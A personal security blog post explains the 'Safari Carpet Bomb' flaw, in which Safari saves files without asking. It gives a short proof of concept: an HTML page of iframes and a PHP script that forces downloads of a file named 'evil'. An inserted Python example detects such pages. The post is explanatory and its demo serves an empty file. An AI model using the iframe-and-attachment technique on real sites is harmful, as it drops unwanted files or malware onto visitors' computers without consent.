hac.’s Weblog


Just a place to share my life

Safari Carpet Bomb

Most of you probably know what Safari is. If you don’t, let me briefly describe it in a few words. Safari is a typical web browser like Firefox and Internet Explorer, developed by Apple. As a Mac OS user, you will notice that Safari does not ask for permission before downloading a file. This may not be a security problem for most users, but some annoying things can be done with this feature of Safari. Consider a site http://iam.not.evil/ whose index page contains the following code.

<html>
<body>
<!-- Each frame requests get_file.php; Safari fetches every one and saves the attachment without asking -->
<iframe src="get_file.php"></iframe>
<iframe src="get_file.php"></iframe>
<iframe src="get_file.php"></iframe>
<iframe src="get_file.php"></iframe>
</body>
</html>

Inside get_file.php, we send a file to the user. My attempt is as follows.

<?php
// Read the payload from disk (the demo below uses an empty file named "evil")
$data = file_get_contents("evil");
// Present the body as a binary download rather than something to render
header('Content-Type: application/x-zip');
header('Content-Length: ' . strlen($data));
// "attachment" tells the browser to save the file; Safari does so without a prompt
header('Content-Disposition: attachment; filename=evil');
die($data);
?>

You may try it by visiting the following site. The site below contains only one iframe, which tries to download an empty file named evil to your computer.
http://www.cse.cuhk.edu.hk/~hkho5/security/
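As an added example (not code from the original post), here is a small Python detector for the pattern described above: it collects the iframe targets of a page and flags every one whose response carries a Content-Disposition: attachment header, which is what turns a frame into a silent download. The page and the header responses are constructed inline, so nothing is fetched over the network; a real scanner or proxy would supply its own fetch_headers callback.

```python
"""Flag 'carpet bomb' pages: frames whose targets are served as forced downloads."""
from html.parser import HTMLParser
from typing import Callable, Dict, List


class FrameCollector(HTMLParser):
    """Collect the src attribute of every <iframe> in the document."""

    def __init__(self) -> None:
        super().__init__()
        self.sources: List[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag == "iframe":
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append(value.strip())


def is_forced_download(headers: Dict[str, str]) -> bool:
    """True when the response asks the browser to save the body instead of rendering it."""
    lowered = {k.lower(): v for k, v in headers.items()}
    disposition = lowered.get("content-disposition", "").strip().lower()
    return disposition.startswith("attachment")


def carpet_bomb_indicators(
    html: str, fetch_headers: Callable[[str], Dict[str, str]]
) -> List[str]:
    """Return the frame sources that would be downloaded without any user action."""
    collector = FrameCollector()
    collector.feed(html)
    return [src for src in collector.sources if is_forced_download(fetch_headers(src))]


# Constructed sample: the index page from the post (four frames on the same script).
SAMPLE_HTML = (
    "<html><body>"
    '<iframe src="get_file.php"></iframe><iframe src="get_file.php"></iframe>'
    '<iframe src="get_file.php"></iframe><iframe src="get_file.php"></iframe>'
    "</body></html>"
)

# Constructed sample: headers the PHP script in the post would emit (assumed, no network).
SAMPLE_RESPONSES: Dict[str, Dict[str, str]] = {
    "get_file.php": {
        "Content-Type": "application/x-zip",
        "Content-Disposition": "attachment; filename=evil",
    },
}


def lookup(src: str) -> Dict[str, str]:
    """Offline stand-in for an HTTP HEAD request against the frame target."""
    return SAMPLE_RESPONSES.get(src, {})


if __name__ == "__main__":
    print(carpet_bomb_indicators(SAMPLE_HTML, lookup))
```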

Since Safari does not ask for user consent before downloading a file, the implication is obvious: malware can be downloaded to the victim’s desktop without the user’s consent. This may not cause a security problem in Mac OS, but it does annoy users when, after closing Safari, they discover how beautiful their desktop has become!

This security problem was discovered by Nitesh Dhanjani. He tried to report it to Apple, but Apple thinks it is not a security issue. Furthermore, Microsoft warned that this “special feature” of Safari may enable a blended attack on Windows XP and Windows Vista.

“Microsoft says it is the combination of the default download file location in Safari and how the Windows desktop handles the files that creates the blended threat on all supported versions of Windows XP and Windows Vista when Apple’s Safari for Windows has been installed.” from ZDNet.co.uk

It reminds me that sometimes something is very natural or usual, but that does not mean it is reasonable or safe!


P.S. I don’t know how the Windows desktop handles files. If you know, please let me know.

Filed under: app sec